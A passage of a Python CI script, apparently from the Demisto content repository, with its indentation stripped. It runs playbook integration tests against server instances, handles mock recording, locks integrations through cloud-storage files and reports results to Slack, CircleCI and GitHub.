end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
prints_manager.add_print_job(mock_failed_message, print, thread_index)
rerecord = True
else:
mock_recording_message = start_message + ' (Mock: Recording)'
prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
# Mock recording - no mock file or playback failure.
c = demisto_client.configure(base_url=c.api_client.configuration.host,
api_key=c.api_client.configuration.api_key, verify_ssl=False)
succeed = run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks,
integrations, playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server_url, build_name, prints_manager, thread_index=thread_index)
if rerecord and succeed:
proxy.rerecorded_tests.append(playbook_id)
test_end_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(conf_json_test_details, tests_queue, tests_settings, demisto_api_key, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message, test_options,
slack, circle_ci, build_number, server_url, build_name, prints_manager, is_ami=True, thread_index=0):
start_message = f'------ Test {test_message} start ------'
client = demisto_client.configure(base_url=server_url, api_key=demisto_api_key, verify_ssl=False)
if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
run_test_logic(conf_json_test_details, tests_queue, tests_settings, client, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index)
prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
include_timestamp=True)
return
mock_run(conf_json_test_details, tests_queue, tests_settings, client, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, start_message, prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
try:
res = requests.request("GET",
url,
verify=True,
params=params_dict,
)
res.raise_for_status()
return res.json()
except Exception as e:
raise e
def get_user_name_from_circle(circleci_token, build_number):
url = "https://circleci.com/api/v1.1/project/github/demisto/content/{0}?circle-token={1}".format(build_number,
circleci_token)
res = http_request(url)
user_details = res.get('user', {})
return user_details.get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
circle_user_name = get_user_name_from_circle(circle_ci, build_number)
sc = SlackClient(slack)
user_id = retrieve_id(circle_user_name, sc)
text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
if user_id:
sc.api_call(
"chat.postMessage",
channel=user_id,
username="Content CircleCI",
as_user="False",
text=text
)
def retrieve_id(circle_user_name, sc):
user_id = ''
res = sc.api_call('users.list')
user_list = res.get('members', [])
for user in user_list:
profile = user.get('profile', {})
name = profile.get('real_name_normalized', '')
if name == circle_user_name:
user_id = user.get('id', '')
return user_id
def create_result_files(tests_data_keeper):
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_integration = tests_data_keeper.skipped_integrations
skipped_tests = tests_data_keeper.skipped_tests
with open("./Tests/failed_tests.txt", "w") as failed_tests_file:
failed_tests_file.write('\n'.join(failed_playbooks))
with open('./Tests/skipped_tests.txt', "w") as skipped_tests_file:
skipped_tests_file.write('\n'.join(skipped_tests))
with open('./Tests/skipped_integrations.txt', "w") as skipped_integrations_file:
skipped_integrations_file.write('\n'.join(skipped_integration))
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, value)
return json.loads(item_as_string)
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
prints_manager, placeholders_map, thread_index=0):
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
integration['name'],
'\n'.join(optional_instance_names))
prints_manager.add_print_job(error_msg, print_error, thread_index)
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
elif integration['name'] == 'Demisto REST API':
integration['params'] = {
'url': 'https://localhost',
'apikey': demisto_api_key,
'insecure': True,
}
return True
def collect_integrations(integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations):
integrations = []
is_nightly_integration = False
test_skipped_integration = []
for integration in integrations_conf:
if integration in skipped_integrations_conf.keys():
skipped_integration.add("{0} - reason: {1}".format(integration, skipped_integrations_conf[integration]))
test_skipped_integration.append(integration)
if integration in nightly_integrations:
is_nightly_integration = True
# string description
integrations.append({
'name': integration,
'params': {}
})
return test_skipped_integration, integrations, is_nightly_integration
def extract_filtered_tests(is_nightly):
if is_nightly:
# TODO: verify this response
return [], False, True
with open(FILTER_CONF, 'r') as filter_file:
filtered_tests = filter_file.readlines()
filtered_tests = [line.strip('\n') for line in filtered_tests]
is_filter_configured = bool(filtered_tests)
run_all = RUN_ALL_TESTS_FORMAT in filtered_tests
return filtered_tests, is_filter_configured, run_all
def load_conf_files(conf_path, secret_conf_path):
with open(conf_path) as data_file:
conf = json.load(data_file)
secret_conf = None
if secret_conf_path:
with open(secret_conf_path) as data_file:
secret_conf = json.load(data_file)
return conf, secret_conf
def run_test_scenario(tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf, nightly_integrations,
skipped_integrations_conf, skipped_integration, is_nightly, run_all_tests, is_filter_configured,
filtered_tests, skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index=0, is_ami=True):
playbook_id = t['playbookID']
nightly_test = t.get('nightly', False)
integrations_conf = t.get('integrations', [])
instance_names_conf = t.get('instance_names', [])
test_message = 'playbook: ' + playbook_id
test_options = {
'timeout': t.get('timeout', default_test_timeout),
'memory_threshold': t.get('memory_threshold', Docker.DEFAULT_CONTAINER_MEMORY_USAGE),
'pid_threshold': t.get('pid_threshold', Docker.DEFAULT_CONTAINER_PIDS_USAGE)
}
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf, ]
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf, ]
test_skipped_integration, integrations, is_nightly_integration = collect_integrations(
integrations_conf, skipped_integration, skipped_integrations_conf, nightly_integrations)
if playbook_id in filtered_tests:
playbook_skipped_integration.update(test_skipped_integration)
skip_nightly_test = (nightly_test or is_nightly_integration) and not is_nightly
# Skip nightly test
if skip_nightly_test:
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
prints_manager.add_print_job('Skip test', print, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
if not run_all_tests:
# Skip filtered test
if is_filter_configured and playbook_id not in filtered_tests:
return
# Skip bad test
if playbook_id in skipped_tests_conf:
skipped_tests.add(f'{playbook_id} - reason: {skipped_tests_conf[playbook_id]}')
return
# Skip integration
if test_skipped_integration:
return
# Skip version mismatch test
test_from_version = t.get('fromversion', '0.0.0')
test_to_version = t.get('toversion', '99.99.99')
if not (LooseVersion(test_from_version) <= LooseVersion(server_numeric_version) <= LooseVersion(test_to_version)):
prints_manager.add_print_job(f'\n------ Test {test_message} start ------', print, thread_index,
include_timestamp=True)
warning_message = 'Test {} ignored due to version mismatch (test versions: {}-{})'.format(test_message,
test_from_version,
test_to_version)
prints_manager.add_print_job(warning_message, print_warning, thread_index)
prints_manager.add_print_job(f'------ Test {test_message} end ------\n', print, thread_index,
include_timestamp=True)
return
placeholders_map = {'%%SERVER_HOST%%': server}
are_params_set = set_integration_params(demisto_api_key, integrations, secret_params, instance_names_conf,
playbook_id, prints_manager, placeholders_map, thread_index=thread_index)
if not are_params_set:
failed_playbooks.append(playbook_id)
return
test_message = update_test_msg(integrations, test_message)
options = options_handler()
stdout, stderr = get_docker_memory_data()
text = 'Memory Usage: {}'.format(stdout) if not stderr else stderr
if options.nightly and options.memCheck and not tests_settings.is_local_run:
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
stdout, stderr = get_docker_processes_data()
text = stdout if not stderr else stderr
send_slack_message(slack, SLACK_MEM_CHANNEL_ID, text, 'Content CircleCI', 'False')
run_test(t, tests_queue, tests_settings, demisto_api_key, proxy, failed_playbooks, integrations, unmockable_integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server, build_name, prints_manager, is_ami, thread_index=thread_index)
def get_server_numeric_version(ami_env, is_local_run=False):
"""
Gets the current server version
Arguments:
ami_env: (str)
AMI version name.
is_local_run: (bool)
when running locally, assume latest version.
Returns:
(str) Server numeric version
"""
default_version = '99.99.98'
env_results_path = './env_results.json'
if is_local_run:
print_color(f'Local run, assuming server version is {default_version}', LOG_COLORS.GREEN)
return default_version
if not os.path.isfile(env_results_path):
print_warning(f'Did not find {env_results_path} file, assuming server version is {default_version}.')
return default_version
with open(env_results_path, 'r') as json_file:
env_results = json.load(json_file)
instances_ami_names = set([env.get('AmiName') for env in env_results if ami_env in env.get('Role', '')])
if len(instances_ami_names) != 1:
print_warning(f'Did not get one AMI Name, got {instances_ami_names}.'
f' Assuming server version is {default_version}')
return default_version
instances_ami_name = list(instances_ami_names)[0]
extracted_version = re.findall(r'Demisto-(?:Circle-CI|MarketPlace)-Content-[\w-]+-([\d.]+)-[\d]{5}',
instances_ami_name)
if extracted_version:
server_numeric_version = extracted_version[0]
else:
server_numeric_version = default_version
# make sure version is three-part version
if server_numeric_version.count('.') == 1:
server_numeric_version += ".0"
print_color(f'Server version: {server_numeric_version}', LOG_COLORS.GREEN)
return server_numeric_version
def get_instances_ips_and_names(tests_settings):
if tests_settings.server:
return [tests_settings.server]
with open('./Tests/instance_ips.txt', 'r') as instance_file:
instance_ips = instance_file.readlines()
instance_ips = [line.strip('\n').split(":") for line in instance_ips]
return instance_ips
def get_test_records_of_given_test_names(tests_settings, tests_names_to_search):
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
test_records_with_supplied_names = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name and test_name in tests_names_to_search:
test_records_with_supplied_names.append(test_record)
return test_records_with_supplied_names
def execute_testing(tests_settings, server_ip, mockable_tests_names, unmockable_tests_names,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True):
server = SERVER_URL.format(server_ip)
server_numeric_version = tests_settings.serverNumericVersion
start_message = "Executing tests with the server {} - and the server ip {}".format(server, server_ip)
prints_manager.add_print_job(start_message, print, thread_index)
is_nightly = tests_settings.nightly
is_memory_check = tests_settings.memCheck
slack = tests_settings.slack
circle_ci = tests_settings.circleci
build_number = tests_settings.buildNumber
build_name = tests_settings.buildName
conf, secret_conf = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
demisto_api_key = tests_settings.api_key
default_test_timeout = conf.get('testTimeout', 30)
tests = conf['tests']
skipped_tests_conf = conf['skipped_tests']
nightly_integrations = conf['nightly_integrations']
skipped_integrations_conf = conf['skipped_integrations']
unmockable_integrations = conf['unmockable_integrations']
secret_params = secret_conf['integrations'] if secret_conf else []
filtered_tests, is_filter_configured, run_all_tests = extract_filtered_tests(tests_settings.nightly)
if is_filter_configured and not run_all_tests:
is_nightly = True
if not tests or len(tests) == 0:
prints_manager.add_print_job('no integrations are configured for test', print, thread_index)
prints_manager.execute_thread_prints(thread_index)
return
# turn off telemetry
turn_off_telemetry(server, demisto_api_key)
proxy = None
if is_ami:
ami = AMIConnection(server_ip)
ami.clone_mock_data()
proxy = MITMProxy(server_ip)
failed_playbooks = []
succeed_playbooks = []
skipped_tests = set([])
skipped_integration = set([])
playbook_skipped_integration = set([])
disable_all_integrations(demisto_api_key, server, prints_manager, thread_index=thread_index)
prints_manager.execute_thread_prints(thread_index)
mockable_tests = get_test_records_of_given_test_names(tests_settings, mockable_tests_names)
unmockable_tests = get_test_records_of_given_test_names(tests_settings, unmockable_tests_names)
if is_nightly and is_memory_check:
mem_lim, err = get_docker_limit()
send_slack_message(slack, SLACK_MEM_CHANNEL_ID,
f'Build Number: {build_number}\n Server Address: {server}\nMemory Limit: {mem_lim}',
'Content CircleCI', 'False')
try:
# first run the mock tests to avoid mockless side effects in container
if is_ami and mockable_tests:
proxy.configure_proxy_in_demisto(demisto_api_key, server, proxy.ami.docker_ip + ':' + proxy.PROXY_PORT)
executed_in_current_round, mockable_tests_queue = initialize_queue_and_executed_tests_set(mockable_tests)
while not mockable_tests_queue.empty():
t = mockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
mockable_tests_queue)
run_test_scenario(mockable_tests_queue, tests_settings, t, proxy, default_test_timeout, skipped_tests_conf,
nightly_integrations, skipped_integrations_conf, skipped_integration, is_nightly,
run_all_tests, is_filter_configured, filtered_tests,
skipped_tests, secret_params, failed_playbooks, playbook_skipped_integration,
unmockable_integrations, succeed_playbooks, slack, circle_ci, build_number, server,
build_name, server_numeric_version, demisto_api_key, prints_manager,
thread_index=thread_index)
proxy.configure_proxy_in_demisto(demisto_api_key, server, '')
# reset containers after clearing the proxy server configuration
reset_containers(server, demisto_api_key, prints_manager, thread_index)
prints_manager.add_print_job("\nRunning mock-disabled tests", print, thread_index)
executed_in_current_round, unmockable_tests_queue = initialize_queue_and_executed_tests_set(unmockable_tests)
while not unmockable_tests_queue.empty():
t = unmockable_tests_queue.get()
executed_in_current_round = update_round_set_and_sleep_if_round_completed(executed_in_current_round,
prints_manager,
t,
thread_index,
unmockable_tests_queue)
run_test_scenario(unmockable_tests_queue, tests_settings, t, proxy, default_test_timeout,
skipped_tests_conf, nightly_integrations, skipped_integrations_conf, skipped_integration,
is_nightly, run_all_tests, is_filter_configured, filtered_tests, skipped_tests,
secret_params, failed_playbooks, playbook_skipped_integration, unmockable_integrations,
succeed_playbooks, slack, circle_ci, build_number, server, build_name,
server_numeric_version, demisto_api_key, prints_manager, thread_index, is_ami)
prints_manager.execute_thread_prints(thread_index)
except Exception as exc:
prints_manager.add_print_job(f'~~ Thread {thread_index + 1} failed ~~\n{str(exc)}\n{traceback.format_exc()}',
print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
failed_playbooks.append(f'~~ Thread {thread_index + 1} failed ~~')
raise
finally:
tests_data_keeper.add_tests_data(succeed_playbooks, failed_playbooks, skipped_tests,
skipped_integration, unmockable_integrations)
if is_ami:
tests_data_keeper.add_proxy_related_test_data(proxy)
if build_name == 'master':
updating_mocks_msg = "Pushing new/updated mock files to mock git repo."
prints_manager.add_print_job(updating_mocks_msg, print, thread_index)
ami.upload_mock_files(build_name, build_number)
if playbook_skipped_integration and build_name == 'master':
comment = 'The following integrations are skipped and critical for the test:\n {}'. \
format('\n- '.join(playbook_skipped_integration))
add_pr_comment(comment)
def update_round_set_and_sleep_if_round_completed(executed_in_current_round: set,
prints_manager: ParallelPrintsManager,
t: dict,
thread_index: int,
unmockable_tests_queue: Queue) -> set:
"""
Checks if the string representation of the current test configuration is already in
the executed_in_current_round set.
If it is- it means we have already executed this test and the we have reached a round and there are tests that
were not able to be locked by this execution..
In that case we want to start a new round monitoring by emptying the 'executed_in_current_round' set and sleep
in order to let the tests be unlocked
Args:
executed_in_current_round: A set containing the string representation of all tests configuration as they appear
in conf.json file that were already executed in the current round
prints_manager: ParallelPrintsManager object
t: test configuration as it appears in conf.json file
thread_index: Currently executing thread
unmockable_tests_queue: The queue of remaining tests
Returns:
A new executed_in_current_round set which contains only the current tests configuration if a round was completed
else it just adds the new test to the set.
"""
if str(t) in executed_in_current_round:
prints_manager.add_print_job(
'all tests in the queue were executed, sleeping for 30 seconds to let locked tests get unlocked.',
print,
thread_index)
executed_in_current_round = set()
time.sleep(30)
executed_in_current_round.add(str(t))
return executed_in_current_round
def initialize_queue_and_executed_tests_set(tests):
tests_queue = Queue()
already_executed_test_playbooks = set()
for t in tests:
tests_queue.put(t)
return already_executed_test_playbooks, tests_queue
def get_unmockable_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
unmockable_integrations = conf['unmockable_integrations']
tests = conf['tests']
unmockable_tests = []
for test_record in tests:
test_name = test_record.get("playbookID")
integrations_used_in_test = get_used_integrations(test_record)
unmockable_integrations_used = [integration_name for integration_name in integrations_used_in_test if
integration_name in unmockable_integrations]
if test_name and (not integrations_used_in_test or unmockable_integrations_used):
unmockable_tests.append(test_name)
return unmockable_tests
def get_all_tests(tests_settings):
conf, _ = load_conf_files(tests_settings.conf_path, tests_settings.secret_conf_path)
tests_records = conf['tests']
all_tests = []
for test_record in tests_records:
test_name = test_record.get("playbookID")
if test_name:
all_tests.append(test_name)
return all_tests
def manage_tests(tests_settings):
"""
This function manages the execution of Demisto's tests.
Args:
tests_settings (TestsSettings): An object containing all the relevant data regarding how the tests should be ran
"""
tests_settings.serverNumericVersion = get_server_numeric_version(tests_settings.serverVersion,
tests_settings.is_local_run)
instances_ips = get_instances_ips_and_names(tests_settings)
is_nightly = tests_settings.nightly
number_of_instances = len(instances_ips)
prints_manager = ParallelPrintsManager(number_of_instances)
tests_data_keeper = TestsDataKeeper()
if tests_settings.server:
# If the user supplied a server - all tests will be done on that server.
server_ip = tests_settings.server
print_color("Starting tests for {}".format(server_ip), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(server_ip))
all_tests = get_all_tests(tests_settings)
mockable_tests = []
print(tests_settings.specific_tests_to_run)
unmockable_tests = tests_settings.specific_tests_to_run if tests_settings.specific_tests_to_run else all_tests
execute_testing(tests_settings, server_ip, mockable_tests, unmockable_tests, tests_data_keeper, prints_manager,
thread_index=0, is_ami=False)
elif tests_settings.isAMI:
# Running tests in AMI configuration.
# This is the way we run most tests, including running Circle for PRs and nightly.
if is_nightly:
# If the build is a nightly build, run tests in parallel.
test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
current_thread_index = 0
all_unmockable_tests_list = get_unmockable_tests(tests_settings)
threads_array = []
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion: # Only run tests for given AMI Role
current_instance = ami_instance_ip
tests_allocation_for_instance = test_allocation[current_thread_index]
unmockable_tests = [test for test in all_unmockable_tests_list
if test in tests_allocation_for_instance]
mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
if number_of_instances == 1:
execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
else:
thread_kwargs = {
"tests_settings": tests_settings,
"server_ip": current_instance,
"mockable_tests_names": mockable_tests,
"unmockable_tests_names": unmockable_tests,
"thread_index": current_thread_index,
"prints_manager": prints_manager,
"tests_data_keeper": tests_data_keeper,
}
t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
threads_array.append(t)
t.start()
current_thread_index += 1
for t in threads_array:
t.join()
else:
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion:
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
all_tests = get_all_tests(tests_settings)
unmockable_tests = get_unmockable_tests(tests_settings)
mockable_tests = [test for test in all_tests if test not in unmockable_tests]
execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
sleep(8)
else:
# TODO: understand better when this occurs and what will be the settings
# This case is rare, and usually occurs on two cases:
# 1. When someone from Server wants to trigger a content build on their branch.
# 2. When someone from content wants to run tests on a specific build.
server_numeric_version = '99.99.98' # assume latest
print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
instance_ip = instances_ips[0][1]
all_tests = get_all_tests(tests_settings)
execute_testing(tests_settings, instance_ip, [], all_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
print_test_summary(tests_data_keeper, tests_settings.isAMI)
create_result_files(tests_data_keeper)
if tests_data_keeper.failed_playbooks:
tests_failed_msg = "Some tests have failed. Not destroying instances."
print(tests_failed_msg)
sys.exit(1)
else:
file_path = "./Tests/is_build_passed_{}.txt".format(tests_settings.serverVersion.replace(' ', ''))
with open(file_path, "w") as is_build_passed_file:
is_build_passed_file.write('Build passed')
def add_pr_comment(comment):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CIRCLE_BRANCH']
sha1 = os.environ['CIRCLE_SHA1']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
try:
res = requests.get(url + query, headers=headers, verify=False)
res = handle_github_response(res)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
handle_github_response(res)
else:
print_warning('Add pull request comment failed: There is more then one open pull request for branch {}.'
.format(branch_name))
except Exception as e:
print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
res_dict = response.json()
if not res_dict.ok:
print_warning('Add pull request comment failed: {}'.
format(res_dict.get('message')))
return res_dict
@contextmanager
def acquire_test_lock(integrations_details: list,
test_timeout: int,
prints_manager: ParallelPrintsManager,
thread_index: int,
conf_json_path: str) -> None:
"""
This is a context manager that handles all the locking and unlocking of integrations.
Execution is as following:
* Attempts to lock the test's integrations and yields the result of this attempt
* If lock attempt has failed - yields False, if it succeeds - yields True
* Once the test is done- will unlock all integrations
Args:
integrations_details: test integrations details
test_timeout: test timeout in seconds
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Yields:
A boolean indicating the lock attempt result
"""
locked = safe_lock_integrations(test_timeout,
prints_manager,
integrations_details,
thread_index,
conf_json_path)
try:
yield locked
finally:
if not locked:
return
safe_unlock_integrations(prints_manager, integrations_details, thread_index)
prints_manager.execute_thread_prints(thread_index)
def safe_unlock_integrations(prints_manager: ParallelPrintsManager, integrations_details: list, thread_index: int):
"""
This integration safely unlocks the test's integrations.
If an unexpected error occurs - this method will log it's details and other tests execution will continue
Args:
prints_manager: ParallelPrintsManager object
integrations_details: Details of the currently executed test
thread_index: The index of the thread that executes the unlocking
"""
try:
# executing the test could take a while, re-instancing the storage client
storage_client = storage.Client()
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to unlock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
def safe_lock_integrations(test_timeout: int,
prints_manager: ParallelPrintsManager,
integrations_details: list,
thread_index: int,
conf_json_path: str) -> bool:
"""
This integration safely locks the test's integrations and return it's result
If an unexpected error occurs - this method will log it's details and return False
Args:
test_timeout: Test timeout in seconds
prints_manager: ParallelPrintsManager object
integrations_details: test integrations details
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Returns:
A boolean indicating the lock attempt result
"""
conf, _ = load_conf_files(conf_json_path, None)
parallel_integrations_names = conf['parallel_integrations']
filtered_integrations_details = [integration for integration in integrations_details if
integration['name'] not in parallel_integrations_names]
integration_names = get_integrations_list(filtered_integrations_details)
prints_manager.add_print_job(
f'Attempting to lock integrations {integration_names}, with timeout {test_timeout}',
print,
thread_index,
include_timestamp=True)
try:
storage_client = storage.Client()
locked = lock_integrations(filtered_integrations_details, test_timeout, storage_client, prints_manager, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to lock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
locked = False
return locked
def workflow_still_running(workflow_id: str) -> bool:
"""
This method takes a workflow id and checks if the workflow is still running
If given workflow ID is the same as the current workflow, will simply return True
else it will query circleci api for the workflow and return the status
Args:
workflow_id: The ID of the workflow
Returns:
True if the workflow is running, else False
"""
# If this is the current workflow_id
if workflow_id == WORKFLOW_ID:
return True
else:
try:
workflow_details_response = requests.get(f'https://circleci.com/api/v2/workflow/{workflow_id}',
headers={'Accept': 'application/json'},
auth=(CIRCLE_STATUS_TOKEN, ''))
workflow_details_response.raise_for_status()
except Exception as e:
print(f'Failed to get circleci response about workflow with id {workflow_id}, error is: {e}')
return True
return workflow_details_response.json().get('status') not in ('canceled', 'success', 'failed')
def lock_integrations(integrations_details: list,
test_timeout: int,
storage_client: storage.Client,
prints_manager: ParallelPrintsManager,
thread_index: int) -> bool:
"""
Locks all the test's integrations
Args:
integrations_details: List of current test's integrations
test_timeout: Test timeout in seconds
storage_client: The GCP storage client
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
Returns:
True if all the test's integrations were successfully locked, else False
"""
integrations = get_integrations_list(integrations_details)
if not integrations:
return True
existing_integrations_lock_files = get_locked_integrations(integrations, storage_client)
for integration, lock_file in existing_integrations_lock_files.items():
# Each file has content in the form of <circleci-build-number>:<timeout in seconds>
# If it has not expired - it means the integration is currently locked by another test.
workflow_id, build_number, lock_timeout = lock_file.download_as_string().decode().split(':')
if not lock_expired(lock_file, lock_timeout) and workflow_still_running(workflow_id):
# there is a locked integration for which the lock is not expired - test cannot be executed at the moment
prints_manager.add_print_job(
f'Could not lock integration {integration}, another lock file was exist with '
f'build number: {build_number}, timeout: {lock_timeout}, last update at {lock_file.updated}.\n'
f'Delaying test execution',
print,
thread_index,
include_timestamp=True)
return False
integrations_generation_number = {}
# Gathering generation number with which the new file will be created,
# See https://cloud.google.com/storage/docs/generations-preconditions for details.
for integration in integrations:
if integration in existing_integrations_lock_files:
integrations_generation_number[integration] = existing_integrations_lock_files[integration].generation
else:
integrations_generation_number[integration] = 0
return create_lock_files(integrations_generation_number, prints_manager,
storage_client, integrations_details, test_timeout, thread_index)
def get_integrations_list(test_integrations: list) -> list:
"""
Since test details can have one integration as a string and sometimes a list of integrations- this methods
parses the test's integrations into a list of integration names.
Args:
test_integrations: List of current test's integrations
Returns:
the integration names in a list for all the integrations that takes place in the test
specified in test details.
"""
return [integration['name'] for integration in test_integrations]
def create_lock_files(integrations_generation_number: dict,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
integrations_details: list,
test_timeout: int,
thread_index: int) -> bool:
"""
This method tries to create a lock files for all integrations specified in 'integrations_generation_number'.
Each file should contain <circle-ci-build-number>:<test-timeout>
where the <circle-ci-build-number> part is for debugging and troubleshooting
and the <test-timeout> part is to be able to unlock revoked test files.
If for any of the integrations, the lock file creation will fail- the already created files will be cleaned.
Args:
integrations_generation_number: A dict in the form of {<integration-name>:<integration-generation>}
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
integrations_details: List of current test's integrations
test_timeout: The time out
thread_index:
Returns:
"""
locked_integrations = []
bucket = storage_client.bucket(BUCKET_NAME)
for integration, generation_number in integrations_generation_number.items():
blob = bucket.blob(f'{LOCKS_PATH}/{integration}')
try:
blob.upload_from_string(f'{WORKFLOW_ID}:{CIRCLE_BUILD_NUM}:{test_timeout + 30}',
if_generation_match=generation_number)
prints_manager.add_print_job(f'integration {integration} locked',
print,
thread_index,
include_timestamp=True)
locked_integrations.append(integration)
except PreconditionFailed:
# if this exception occurs it means that another build has locked this integration
# before this build managed to do it.
# we need to unlock all the integrations we have already locked and try again later
prints_manager.add_print_job(
f'Could not lock integration {integration}, Create file with precondition failed.'
f'delaying test execution.',
print_warning,
thread_index,
include_timestamp=True)
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
return False
return True
def unlock_integrations(integrations_details: list,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
thread_index: int) -> None:
"""
Delete all integration lock files for integrations specified in 'locked_integrations'
Args:
integrations_details: List of current test's integrations
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
thread_index: The index of the thread that executes the unlocking
"""
locked_integrations = get_integrations_list(integrations_details)
locked_integration_blobs = get_locked_integrations(locked_integrations, storage_client)
for integration, lock_file in locked_integration_blobs.items():
try:
# Verifying build number is the same as current build number to avoid deleting other tests lock files
_, build_number, _ = lock_file.download_as_string().decode().split(':')
if build_number == CIRCLE_BUILD_NUM:
lock_file.delete(if_generation_match=lock_file.generation)
prints_manager.add_print_job(
f'Integration {integration} unlocked',
print,
thread_index,
include_timestamp=True)
except PreconditionFailed:
prints_manager.add_print_job(f'Could not unlock integration {integration} precondition failure',
print_warning,
thread_index,
include_timestamp=True)
def get_locked_integrations(integrations: list, storage_client: storage.Client) -> dict:
"""
Getting all locked integrations files
Args:
integrations: Integrations that we want to get lock files for
storage_client: The GCP storage client
Returns:
A dict of the form {<integration-name>:<integration-blob-object>} for all integrations that has a blob object.
"""
